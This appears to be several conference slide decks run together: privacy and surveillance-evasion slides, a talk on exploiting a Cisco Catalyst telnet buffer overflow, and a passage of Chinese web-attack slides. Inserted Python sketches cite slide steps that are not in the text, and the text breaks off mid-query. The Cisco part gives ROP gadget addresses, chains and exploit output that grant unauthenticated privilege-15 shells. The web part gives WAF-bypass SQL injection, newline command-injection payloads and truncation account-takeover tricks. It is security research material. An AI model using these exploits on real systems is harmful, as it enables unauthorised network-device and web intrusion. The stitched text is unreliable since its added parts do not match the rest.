Hexagon Security Group Privacy and Changing models Keywords: Privacy Bill of Rights Strict Constructionists The Eighth Amendment The Hacker Pimps The Hexagon Security Group Google and Changing Models The Hacker Pimps The Hexagon Security Group A Change of Focus ● We spend a lot of time worrying about people knowing who we are or where we connect from. ● There is a larger problem of people knowing what we are. – This is the ultimate goal of collection technologies. The Hacker Pimps The Hexagon Security Group Who You Are ● Who you are is your identity and all of the associated items that identify you: – Name – Address – SSN – Phone Number – Etc. The Hacker Pimps The Hexagon Security Group What You Are ● Male / Female. ● Race, Non-Religious / Religious, Straight / Gay. ● Diabetic, Asmatic, other medical conditions. ● Mental issues. ● Veteran. ● Porn addict. ● Compulsive masturbator. The Hacker Pimps The Hexagon Security Group Who and What ● Put both the Who and the What together and it starts to get real scary. The Hacker Pimps The Hexagon Security Group Collected Data ● Collected data is dangerous. – It can be sold. – It can be misused. (Government creating files on all of us). – Incorrect assumptions can be made on this collected data. – May be impossible to correct inaccuracies. ● Data is collected from: – Aggregates – Inference The Hacker Pimps The Hexagon Security Group Aggregated Data ● Data collected from multiple sources in order in to obtain a more complete picture. ● Example: Collecting data from multiple sources to get an idea of your shopping habits: – Credit Card – Grocery Rewards – Mailing Lists from Businesses – Etc. 
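Referring back to the "P2P Identity Diffusion" steps (a-f) a few slides up, a toy Python sketch of the mixing logic follows. The helper names, the local list used as a stand-in for the P2P swarm, and the N=30 default are hypothetical, and the real proposal routes all of this over Tor, which the sketch omits.

import random

N = 30   # crowd size from the slides: how many decoy queries to blend with

def diffuse(own_query, fetch_from_p2p, publish_to_p2p, search):
    # Publish our query to the swarm, pull N queries from peers, and run our
    # own search somewhere in the middle of the decoy traffic (steps a-e).
    publish_to_p2p(own_query)                        # a: share our terms with the swarm
    decoys = [fetch_from_p2p() for _ in range(N)]    # b: download N peer queries
    own_slot = random.randrange(N)                   # e: fire after rand() % N decoys
    for i, decoy in enumerate(decoys):
        if i == own_slot:
            search(own_query)
        search(decoy)                                # d: decoys run in the background

# Toy wiring so the sketch runs stand-alone; a real swarm would not be a
# local LIFO list, and every request would go through Tor (step c).
swarm = ["peer query %d" % i for i in range(100)]
diffuse("my real query", fetch_from_p2p=swarm.pop,
        publish_to_p2p=swarm.append, search=lambda q: print("searching:", q))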
The Hacker Pimps The Hexagon Security Group Inferred Data ● An inference made from collected data. ● Less accurate than aggregated data. ● Often inferences can be wrong, such as: – Example: You buy multiple packs of Sudafed, so you must be cooking Meth. – Example: You drive through bad parts of town, so you must be buying drugs. The Hacker Pimps The Hexagon Security Group A Step Further ● What if a profile of you was created from this collected data both aggregated and inferred. ● Think back to the previous slide about “what you are”, a couple theoretical situations: – Statistics could show that since you watch certain shows, download porn, and have diabetes that you are 30% more likely to kill someone. – 40% more likely to be guilty of domestic violence. ● Do you really want data like this in the hands of people that can't protect it anyway? The Hacker Pimps The Hexagon Security Group Eating Your Own Cake ● You can't freely share information, and expect to keep it private. – Social networks, blogs, etc. – Public Resumes and CVs. ● Even using an alias can be dangerous. ● Decide what you want people to know about you, and make it public. The Hacker Pimps The Hexagon Security Group So How Does It Work? The Hacker Pimps The Hexagon Security Group Recognition Technologies ● Traditional Biometrics ● Also, linguistics and web habits. – MS is working on technology to identify you through your web habits. ● If this technology is widespread it could be next to impossible to correct inaccuracies. The Hacker Pimps The Hexagon Security Group Scary S#!7 The Hacker Pimps The Hexagon Security Group It's Only Going To Get Worse ● Your information is big business $$$ – Not just your personal information but psudo-profile information as well. ● Computers need to learn to forget. – Viktor Mayer-Schönberger – Useful Void: The Art of Forgetting in the Age of Ubiquitous Computing ● Not to mention all of this affects our freedom of speech. The Hacker Pimps The Hexagon Security Group Future Connected Technologies ● Just think if your home could talk, all of the things it could say about you. In the future, it will talk and probably not to who you want it to. ● Future connected homes are going to become a hotbed for embedded spyware. It is inevitable. – Connected Devices and appliances = Collected Information ● We did an entire presentation on this at Hope Number Six last year. The Hacker Pimps The Hexagon Security Group Future Connected Technologies ● We freely give away our rights when we agree to the user agreement. ● We allow companies to spy on us. ● Unless we refuse to use their items, this trend will not change. ● We need to start looking at new technology as researchers and not as simple users if we care about our information. The Hacker Pimps The Hexagon Security Group System Models ● My Co-workers Philosophy about computers – Way too simple, but we can start there anyway – The basics of a system ● Input – Processing – Output Input Processing Output Now lets expand on this a bit The Hacker Pimps The Hexagon Security Group Slightly Expanded Model ● Let's add a couple of components – Method – Storage – Who does the output go to Input Processing Output Method Who Storage The Hacker Pimps The Hexagon Security Group Analyzing These Systems ● Analysis is the first step to mitigating the effects from these systems. ● Items that will affect your continued efforts will be determined by a couple of factors: – Is this installed software? – Is this black box technology? – System out of your control? 
The Hacker Pimps The Hexagon Security Group Analyzing These Systems ● It is not necessary to know all the pieces of the puzzle. ● Know your devices and software. ● What do you have to work with? – These systems are going to have to have interface with you. – It may only take one interface to make an attack surface. The Hacker Pimps The Hexagon Security Group Installed Software ● Read EULA and associated documentation. ● Remember, this is installed on your system. ● What does the software do (its intended purpose)? – Inventory these purposes. – Now what is it doing on your machine? ● Compare the purpose with the actions it is taking on your system. The Hacker Pimps The Hexagon Security Group Installed Software ● Concerns – What files / parts of the computer is it accessing? ● Why? Is it a function of that application? – Did it scatter pieces of itself all over – Is it sending information to a 3rd party? The Hacker Pimps The Hexagon Security Group Installed Software ● Use tools at your disposal to analyze behavior of software. Remember, you have full access to the system. ● Communications – If software is spying on you it is going to send the data somewhere. – Where is it sending data? – What protocol is it using? – What is the format of the data? The Hacker Pimps The Hexagon Security Group Installed Software ● File Access – What files does the software access? – Is it expected to access those files? ● Tools to use – Network (Wireshark, TCPdump, etc.) – File Access (lsof, filemon, etc.) ● Is the software open source? – Look at the code or find someone with an analysis that did. The Hacker Pimps The Hexagon Security Group Installed Software ● Research the web for known issues. ● Keep in mind the installed software most likely has access to all of the information on your computer. The Hacker Pimps The Hexagon Security Group Black Box Analysis ● Read agreements and other documentation. ● Know the device. – What is the function of the device? – What medium does it use to transfer data? – What interfaces does it have? ● What type of information does the black box have access to? – Remember it doesn't have to be Credit Card data to be important. The Hacker Pimps The Hexagon Security Group Black Box Analysis ● Is there a way visually or audibly observe behavior? – Activity lights, Hard drive activity, etc. – Are there times when this activity can be observed being heavier than usual while certain functions are being performed? ● Can you put a device on the medium to listen for communication? ● Does it have other interfaces that can be messed with? The Hacker Pimps The Hexagon Security Group Black Box Example ● A Cable Box with a built in DVR ● Information – Has access to television and movie data you watch. ● Real-time and recorded. – Your schedule. ● Would know when you are home and when you are away. ● Medium to transfer data. – Transfers data over coaxial cable. The Hacker Pimps The Hexagon Security Group Black Box Example ● Has multiple interfaces. – Infrared. – USB – Serial – Multiple Coax inputs – Multiple misc video inputs ● Visual and Audible – Hard drive – Lights The Hacker Pimps The Hexagon Security Group Systems Out Of Your Control ● Read agreements, documentation, warnings, etc. ● Most likely you are going to have a severely lowered surface to work with. ● Identify Interfaces. ● Identify data the system has access to. 
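Tying back to the "Installed Software" tooling mentioned above (Wireshark, TCPdump, lsof, filemon), a minimal sketch of wrapping lsof to snapshot which files a suspect process has open; the PID is a placeholder, and this covers only the file-access side of the analysis, not the network side.

import subprocess

def open_files(pid):
    # Snapshot the files a running process currently has open, via lsof -p <pid>.
    result = subprocess.run(["lsof", "-p", str(pid)],
                            capture_output=True, text=True)
    return result.stdout.splitlines()

for line in open_files(1234):   # 1234 is a placeholder PID for the suspect program
    print(line)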
The Hacker Pimps The Hexagon Security Group Systems Example ● Surveillance system with /detection ● Information Collected – Identification Information – Location Information ● Transfer medium – Wireless? – Ethernet? The Hacker Pimps The Hexagon Security Group Systems Example ● Interfaces – Video Camera (Probably the only one you are going to have access to) The Hacker Pimps The Hexagon Security Group Attacking Systems ● What is the goal of attacking these systems? – Affect integrity – Affect availability – Sometimes confidentiality ● Basically making the system's data so it can't be trusted. ● Simply, sometimes systems can be attacked by just not using them. The Hacker Pimps The Hexagon Security Group The Point of This If a systems data can not be trusted or counted upon, then the system will not be used or rendered ineffective. Bad data + Bad decisions = Unreliable Systems If banks had the tendency to loose your money, would you use them? The Hacker Pimps The Hexagon Security Group A New Way To Look Attacks ● A new classification scheme for attacks on information gathering systems and other systems that invade our privacy. ● This classification scheme can be broken down in to three levels. – Level 1 Attacks – Level 2 Attacks – Level 3 Attacks The Hacker Pimps The Hexagon Security Group Level 1 ● Level 1 Attack: Affects the ability of the input device to perform its function. ● Examples: – Destruction of input device. – Disabling of the input device. – Cause a malfunction under certain conditions. The Hacker Pimps The Hexagon Security Group Level 2 ● Level 2 Attack: Affects the accuracy of the data stored. ● Examples: – Injecting bad data. – Injecting massive amounts of data. ● May overflow the capacity of the storage media. ● Useless data. The Hacker Pimps The Hexagon Security Group Level 3 ● Level 3 Attack: Affects processing decisions of the system. ● Examples: – Falsely triggering events based on algorithms (False Positives) – Bypassing system by not triggering events (False Negatives) The Hacker Pimps The Hexagon Security Group Nice!!! ● Cell phone monitoring anyone? – “Hey, have you heard that new band assassination plot, they're the bomb.” ● I have a friend who seems to have the uncanny ability to work in words such bomb, nuclear, and assassin in every phone conversation we have. The Hacker Pimps The Hexagon Security Group Examples The best way to have a look at this is through some examples. These are very simple examples, many of the systems in the wild will be a lot more complex. The Hacker Pimps The Hexagon Security Group Example 1 ● Simple Security Camera (without an active watch) Movement / Actions Camera DVR TV Human Analysis Data Collected Method / Input Storage Output Processing / Analysis The Hacker Pimps The Hexagon Security Group Example 1 ● Most likely attack would be on the input device. (Level 1) ● Can the input device be taken out? – Destroyed – Blinded ● The data stored could also be attacked. (Level 2) – Dress up in a suit like a giant banana The Hacker Pimps The Hexagon Security Group Example 2 ● Security Camera (with intelligence) Movement / Actions Camera Monitor Human Follow-up Computer Data Collected Method / Input Output / Alert Analyzes data based on behavior The Hacker Pimps The Hexagon Security Group Example 2 ● Can the input device be taken out? (Level 1) – Destroyed – Blinded ● What behavior triggers an event? 
(Level 3) – Falsely trigger events The Hacker Pimps The Hexagon Security Group Example 3 ● RFID Passport Personal Identifying Scanner Computer Monitor Human Follow-up Central Database Method / Input Data Collected The Hacker Pimps The Hexagon Security Group Example 3 ● What if 1 out of every 5 passports wouldn't read. – Frying the passport (Level 1) ● What if 1 out of every 20 had wrong information. – Injecting bad data (Level 2) ● Think about the availability of frequent travelers. ● Think of the impact that would have The Hacker Pimps The Hexagon Security Group Example 4 ● Stealth Retina scanning at a department store to identify those pesky customers that pay cash. Personal Identifying Scanner Computer Report Marketing / Ordering Central Database Method / Input Data Collected Central Storage Decisions based on behavior Output The Hacker Pimps The Hexagon Security Group Example 4 ● Just be cool – Wear sunglasses inside the store (Level 1) – Don't shop at the fscking store anymore (Level 1) The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Avoid using systems that collect data about you. ● Encrypt communications and ensure you are communicating with who you think you are. ● Analyze systems you have and filter unwanted traffic. ● Contact companies and tell them you refuse to use their services anymore, unless they change. The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Use a new discount card every time. – Or only use discount card when it is really funny for tampons and douches – Interesting new trend in discount cards ● Minimize use of credit card. ● Leave as little data as possible behind. ● Use encryption when instant messaging. ● Use encryption for Email. The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Analyze new toys for potential issues. – Possible backdoor accounts – Possible hidden communication ● Beware of any technology that can track you or put you in a given place at a certain time. ● Intrusive stores should be avoided. The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Remember, at first always view the next big thing or the newest gadget as a threat. – Move on when you have verified The Hacker Pimps The Hexagon Security Group The False Life Project ● The False Life Project is a project to open lines of communication and discuss defeating behavioral based analysis. – People knowing what and who we are. ● Build tools to implement ideas discussed in the project. ● Increase privacy. ● http://falselife.hackerpimps.com The Hacker Pimps The Hexagon Security Group Sysmin Sys73m47ic sysmin{at}neohaxor{dot}org Marklar marklar51{at}gmail{dot}com The Hacker Pimps www.hackerpimps.com The Hexagon Security Group www.hexsec.com
pdf
Cisco Catalyst Exploitation Artem Kondratenko @artkond Whoami -Penetration tester @ Kaspersky Lab -Hacker -OSC(P|E) -Skydiver ;) Long story short • On March 26th 2017 Cisco announces that numerous models of switches are vulnerable to unauthenticated remote code execution vulnerability • No signs of exploitation in the wild • No exploit available Cisco advisory Cisco advisory Vendor advice: Disable telnet Disable telnet folks • Telnet is an old legacy protocol Disable telnet folks • Telnet is an old legacy protocol • SSH has been around for decades – a secure replacement for telnet Disable telnet folks • Telnet is an old legacy protocol • SSH has been around for decades – a secure replacement for telnet • Even more: according to the advisory, using telnet on a catalyst switch might be simple way for the attacker fully compromise the switch Still not convinced • No public exploit • No knowledge of in-the-wild exploitation • Critical-shmitical, should we even care? Public sources for researching the vulnerability • Cisco advisory • Vault 7 leak Vault 7: Hacking Tools Revealed Hacking techniques and potential exploit descriptions for multiple vendors. This was the source Cisco Systems used for their research on the advisory released on March 26th Cisco switch exploit Codename: ROCEM Cisco switch exploit Codename: ROCEM Cisco switch exploit Codename: ROCEM Rocem: Modes of Interaction • Set • Run exploit to set credless authentication • Unset • Run exploit to set credentials back in place • Interactive Mode • Exploit the system and present the attacker with shell immediately Easy enough. The perfect plan • Take two switches • Cluster dem switches! • Look for a magic whatever there is in the traffic • ??? • Profit!!! Clustering Cisco switches Controlling Slave-switches from Master $ telnet 192.168.88.10 catalyst1#rcommand 1 catalyst2#show priv Current privilege level is 15 Clustering Catalyst switches Telnet? Clustering Cisco switches: L2 telnet Magic telnet option Telnet Debug log from Vault ROCEM testing notes Telnet commands and options All Hope Is Lost Replaying CISCO_KITS option during generic telnet session doesn’t work L And also... Cisco IPS rule for this vuln is called “Cisco IOS CMP Buffer Overflow” Peeking at firmware The firmware is available at the flash partition of the switch: catalyst2#dir flash: Directory of flash:/ 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122- 55.SE1.bin 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text 4 -rwx 3096 Mar 1 1993 00:09:27 +00:00 multiple-fs Peeking at firmware $ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 1120x70 bzip2 compressed data, block size = 900k Unpacked binary size is around 30 mb The Reality L Jokes aside • CPU Architecture: PowerPC 32 bit big-endian • Entry point at 0x3000 (obvious during device boot process if you look at it via serial) Discovering functions with IDA python • Nice script by Federico Muttis (aka @acid_) • https://exploiting.wordpress.com/2011/12/06/quickpost- idapython-script-to-identify-unrecognized-functions/ Discovering functions with IDA python Result: ~80k functions discovered ahhh.. the pain of static analysis • No symbols.. Well, of course • The whole OS is a single binary • Indirect function call via function call tables filled at run time Setting up debug environment • There’s no public SDK • Some firmware has a “gdb kernel” command. 
• Custom gdb server protocol • Unsupported by modern versions of gdb Two options: • Dig up an old gdb version and try to patch it • Use IODIDE (by nccgroup) George Nosenko built an IDA adapter to debug IOS but it’s not public So I patched GDB… IODIDE – the smooth experience Well.. Had to debug IODIDE to be able to debug IOS Hunting for string XREFS After recognizing functions and strings with IDAPython XREFS start to appear: Digging deeper Cluster all telnets! • Telnet code is rather symmetrical • The code for parsing a custom clustering command for client and server side is found in the same function Cluster all telnets! Client side sends a string: «\x03CISCO_KITS\x012::1:» Second string modifier %s – was observed empty in the traffic dump Let’s take a closer look at the code that parses this string Cluster all telnets! • The server portion of the code parses the “CISCO_KITS” options further down the code • And it does it in an interesting manner J Cluster telnet Copying until “:” to the buffer residing on the stack..J Buffalo overflow! Smashing the stack • PowerPC stack frame • Local arguments are placed above the return address • If the buffer boundaries are not checked we get ourselves a typical overflow scenario Smashing the stack Overwriting the return address means the execution flow is now controlled with user input Locating the PC overwrite offset • Cyclic patterns are often used to determine the exact location in the user-supplied buffer that overflows the return address • https://github.com/Gallopsled/pwntools - very nice lib with the ability to generate cyclic patterns PC = 0x64384164 or ‘d8Ad’ in ASCII from pwn import * payload = cyclic_metasploit(200) sock.send(payload) cyclic_metasploit_find(‘d8Ad’) Result: 115 Crash – instruction pointer is overwritten by a DWORD at offset 115 (116th byte) Too easy? • By the book overflow • R9 points to our buffer • No bad chars • Wow, that looks to good to be true • Just overwrite Program Counter with a gadget that jumps to R9 The “jump to r9” gadget 1. Load the contents of register R9 to CTR register 2. Never mind the garbage instruction J 3. ”Branch CTR” instruction transfers the control flow to the address contained in register CTR Doing it like a pro • Just need to place the address of the ”jmp r9” gadget to the place where PC is overwritten • What could possibly go wrong? Fail • Both heap and stack are non-executable. Btw, stack resides on the heap ;) • Device reboots • But why? Is this data execution prevention? • I don’t know • But there’s been research on Cisco devices before • Let’s recall the brilliant presentation @BlackHat by Felix "FX" Lindner • It is suggested that this might happen because of instruction and data caching in PowerPC RETURN ORIENTED PROGRAMMING Return oriented programing: Why? • A technique to bypass DEP (data execution prevention) • In our case we avoid instruction caching Return oriented programing: How does it work? • Use existing code in the binary to achieve your goals • Use stack as the data source for instructions that are used • Chain snippets of code (gadgets) via jmp/call/ret instructions Return oriented programing: How does it work? A candidate gadget must meet two conditions: 1. Execute payload (i.e. reading or writing to some memory) 2. Contain instructions to be able to transfer execution flow to the next gadget Return oriented programing: Limitations • There is only a limited set of gadgets available • Most gadgets modify stack frame. This has to taken into account. 
Returning execution flow to its original path might be tricky because of this. What kind of action can be performed via ROP? •Arbitrary memory writes ...which might lead to.. •Arbitrary code execution Arbitrary memory writes via ROP The idea is simple: • Find a gadget that loads values from the stack into registers • One value will be used as an address to write to • Another on will be used as a value to be written at that address • Find a second gadget that performs a write operation with those two registers • I.E. write value contained in register r30 to address contained in register r31 One necessary requirement: The gadget should be able to jump to the next gadget or, if it is the last one, properly return the execution flow. In both cases we’re looking for gadgets that do an additional operation consisting of the following primitives: • Take next gadget’s address from the stack • Load it into the Link Register • Jump to the value in the Link Register Gadget chaining to perform arbitrary memory writes Typical function epilog in the firmware Write primitive #1 Write primitive #1 Write primitive #1 1. Move stack by 0x10 2. Jump to next gadget Write primitive #1 Write primitive #2 The result We just wrote arbitrary data to arbitrary address Looking for gadgets • https://github.com/sashs/Ropper Ok, whatever dude... But whatcha gonna write? The plan is: • Find a good place in firmware to patch. It might be: • Control flow • Inner data structures related to authentication • Function pointers The perfect plan First thing that comes to mind – patch the execution flow, responsible for the credential check. Wow... Looks like it worked: $ telnet 192.168.88.10 Trying 192.168.88.10... Connected to 192.168.88.10. Escape character is '^]'. catalyst1> Not quite L Works only under the debugger. Exception is triggered when trying to exploit the live set-up More static analysis • A couple of hours (days?) later... More static analysis • A couple of hours (days?) later... More static analysis • A couple of hours (days?) later... Long story short • Both is_cluster_mode and get_privilege_level are reference indirectly • This means a memory pointer is dereferenced containing the actual function address • We can apply our write-primitives to change this pointer to something we like But why are this funcs important? If is_cluster_mode mode returns a non-zero value then the decision to present a user with shell is only based on privilege level Indirect function calls Got privileges? No creds required Got privileges? No creds required Finish him! • We will overwrite the pointer to is_cluster_mode with a function that always returns 1 • We will overwrite the pointer to get_privilege_level with a funciton that always returns 15 The only thing left is to find suitable gadgets for this 1st gadget 0x000037b4: lwz r0, 0x14(r1) mtlr r0 lwz r30, 8(r1) lwz r31, 0xc(r1) addi r1, r1, 0x10 blr 1. Put ret address into r0 2. Load data pointed by r1+8 into r30 (is_cluster_mode func pointer) 3. Load data pointed by r1+0xc into r31 (address of “ret 1” function) 4. Add 0x10 to stack pointer 5. BLR! We jump to the next gadget 2nd gadget 0x00dffbe8: stw r31, 0x34(r30) lwz r0, 0x14(r1) mtlr r0 lmw r30, 8(r1) addi r1, r1, 0x10 blr 1. Write r31 contents to memory pointer by r30+0x34 2. Move next gadget’s address into r0 3. Junk code 4. Shift stack by 0x10 bytes 5. BLR! Jump to the next gadget 3rd, 4th and 5th gadgets 0x0006788c: lwz r9, 8(r1) lwz r3, 0x2c(r9) lwz r0, 0x14(r1) mtlr r0 addi r1, r1, 0x10 blr 1. 
r3 = *(0x2c + *(r1+8)) - address of pointer to get_privilege_level func 2. R31 = *(r1 + 8) – r31 conteints address of function that always return 15 3. Overwrite the pointer 0x006ba128: lwz r31, 8(r1) lwz r30, 0xc(r1) addi r1, r1, 0x10 lwz r0, 4(r1) mtlr r0 blr 0x0148e560: stw r31, 0(r3) lwz r0, 0x14(r1) mtlr r0 lwz r31, 0xc(r1) addi r1, r1, 0x10 blr PROFIT! $ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set [+] Connection OK [+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f' [+] Sending cluster option [+] Setting credless privilege 15 authentication [+] All done $ telnet 192.168.88.10 Trying 192.168.88.10... Connected to 192.168.88.10. Escape character is '^]'. catalyst1#show priv Current privilege level is 15 Demo time! Side notes • These switch models are common on pentests • Successfully exploited this vulnerability on real life engagements: • Leak firmware version via SNMP or CDP • Customize exploit for the exact version • Enjoy your shell Further research • Shellcode reliability for multiple firmware versions • Automating the search for suitable ROP gadgets • Finding a way execute arbitrary PPC instructions instead of arbitrary memory writes Stuff to think about • We know that switches find neighbors suitable for clustering using CDP protocol • We know that there might be no authentication in place • We know that the master switch is able to fully control the slave via a privilege 15 shell What if... • We are in the same broadcast segment as the target switch • We craft the necessary CDP packets so the target switch considers us a candidate for clustering • We make an L2 telnet connection asking for a shell simulating the cluster “rcommand” Will this work? • Remains to be seen • Ongoing research Thanks! Check PoC source at: https://github.com/artkond/cisco-rce @artkond artkond.com
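As a rough companion to the write-primitive walkthrough above: on this 32-bit big-endian PowerPC target, building the ROP chain is mostly bookkeeping over 4-byte words. The sketch below shows only that packing step, reusing the gadget addresses from the slides; the filler sizes, slot positions, and the where/what values are placeholders to verify in the debugger, not the layout of the published exploit.

import struct

# Gadget addresses taken from the slides
GADGET_LOAD_R30_R31 = 0x000037B4       # lwz r30,8(r1); lwz r31,0xc(r1); ...; blr
GADGET_STORE_R31_TO_R30 = 0x00DFFBE8   # stw r31,0x34(r30); ...; blr

def word(value):
    return struct.pack(">I", value & 0xFFFFFFFF)   # 4-byte big-endian words

def write_frame(where, what, next_gadget):
    # Schematic stack frame consumed by the first gadget: it loads r30/r31
    # from fixed slots and branches to whatever sits in its saved-LR slot.
    # The filler sizes are placeholders to line the slots up, nothing more.
    frame  = b"A" * 8              # padding up to the r30 slot
    frame += word(where)           # -> r30: the second gadget stores to r30+0x34
    frame += word(what)            # -> r31: the value that gets written
    frame += b"B" * 4              # padding up to the saved-LR slot
    frame += word(next_gadget)     # where the first gadget's blr continues
    return frame

# The first gadget's own address is what overwrites the saved return address
# in the CISCO_KITS overflow; this frame is what it then consumes.
chain = word(GADGET_LOAD_R30_R31) + write_frame(
    where=0x12345678, what=0xDEADBEEF, next_gadget=GADGET_STORE_R31_TO_R30)
print(chain.hex())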
pdf
• 蔡政達 a.k.a Orange • CHROOT 成員 / HITCON 成員 / DEVCORE 資安顧問 • 國內外研討會 HITCON, AVTokyo, WooYun 等講師 • 國內外駭客競賽 Capture the Flag 冠軍 • 揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱 點漏洞 • 專精於駭客⼿手法、Web Security 與網路滲透 #90後 #賽棍 #電競選⼿手 #滲透師 #Web狗 #🐶 – 講 Web 可以講到你們聽不懂就贏了 – 「⿊黑了你,從不是在你知道的那個點上」 – 擺在你眼前是 Feature、擺在駭客眼前就是漏洞 - 別⼈人笑我太瘋癲,我笑他⼈人看不穿 - 猥瑣「流」 Q: 資料庫中的密碼破不出來怎麼辦? 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 XSS XXE SQL Injection CSRF 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 Struts2 OGNL RCE Rails YAML RCE PHP Memory UAF XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection Length Extension Attack ShellShock HeartBleed JSONP Hijacking FastCGI RCE NPRE RCE OVERLAYFS Local Root CSRF Bit-Flipping Attack 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 🌰 - Perl 語⾔言特性導致網⾴頁應⽤用程式漏洞 🌰 @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # ? $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # wrong! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') }; @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # correct! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname => $cgi->param('realname'), cryptpassword => $password }); my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname => $cgi->param('realname'), cryptpassword => $password }); # index.cgi? realname=xxx&realname=login_name&realname= admin - Windows 特性造成網⾴頁應⽤用限制繞過 🌰 • Windows API 檔名正規化特性 - shell.php # shel>.php # shell"php # shell.< • Windows Tilde 短檔名特性 - /backup/20150707_002dfa0f3ac08429.zip - /backup/201507~1.zip • Windows NTFS 特性 - download.php::$data – 講些⽐比較特別的應⽤用就好 • MySQL UDF 提權 - MySQL 5.1 - @@plugin_dir - Custom Dir -> System Dir -> Plugin Dir • 簡單說就是利⽤用 into outfile 建⽴立⺫⽬目錄 - INTO OUTFILE 'plugins::$index_allocation' - mkdir plugins – 對系統特性的不了解會導致「症狀解」 – 講三個較為有趣並被⼈人忽略的特性與技巧 • 問題點 - 未正確的使⽤用正規表⽰示式導致⿊黑名單被繞過 • 範例 - WAF 繞過 - 防禦繞過 - 中⽂文換⾏行編碼繞過網⾴頁應⽤用防⽕火牆規則 http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*三*/FROM dual-- http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual-- http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual-- %u4E0A %u4D0A ... 
- 繞過防禦限制繼續 Exploit for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } } exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg &arg[1]=800 &arg[2]=600 for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } } exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg|sleep 7| &arg[1]=800;sleep 7; &arg[2]=600$(sleep 7) for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } } exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg%0A &arg[1]=sleep &arg[2]=7%0A - 繞過防禦限制繼續 Exploit - 駭客透過 Nginx ⽂文件解析漏洞成功執⾏行 Webshell 是 PHP 問題,某⽅方⾯面也不算問題(?)所也沒有 CVE PHP 後⾯面版本以 Security by Default 防⽌止此問題 差不多是這種狀況 http://hackme.cc/avatar.gif/foo.php ; Patch from 80sec if ($fastcgi_script_name ~ ..*/.*php) { return 403; } http://www.80sec.com/nginx-securit.html It seems to work http://hackme.cc/avatar.gif/foo.php But ... http://hackme.cc/avatar.gif/%0Afoo.php NewLine security.limit_extensions (>PHP 5.3.9) • 問題點 - 對資料不了解,設置了錯誤的語系、資料型態 • 範例 - ⼆二次 SQL 注⼊入 - 字符截斷導致 ... - 輸⼊入內容⼤大於指定形態⼤大⼩小之截斷 $name = $_POST['name']; $r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) mysql> CREATE TABLE users ( -> id INT, -> name VARCHAR(255), -> pass VARCHAR(255) -> ); Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO users VALUES(2, 'admin ... x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+------------------+------+ | id | name | pass | +------+------------------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+------------------+------+ 2 rows in set (0.00 sec) name: admin ... x [space] x 250 CVE-2009-2762 WordPress 2.6.1 Column Truncation Vulnerability - CREATE TABLE users (id INT, name TEXT, ...) CVE-2015-3440 WordPress 4.2.1 Truncation Vulnerability - Unicode 編碼之截斷 🍊 $name = $_POST['name']; if (strlen($name) > 16) die('name too long'); $r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) DEFAULT CHARSET=utf8 mysql> CREATE TABLE users ( -> id INT, -> name VARCHAR(255), -> pass VARCHAR(255) -> ) DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.01 sec) mysql> INSERT INTO users VALUES(2, 'admin🍊x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM 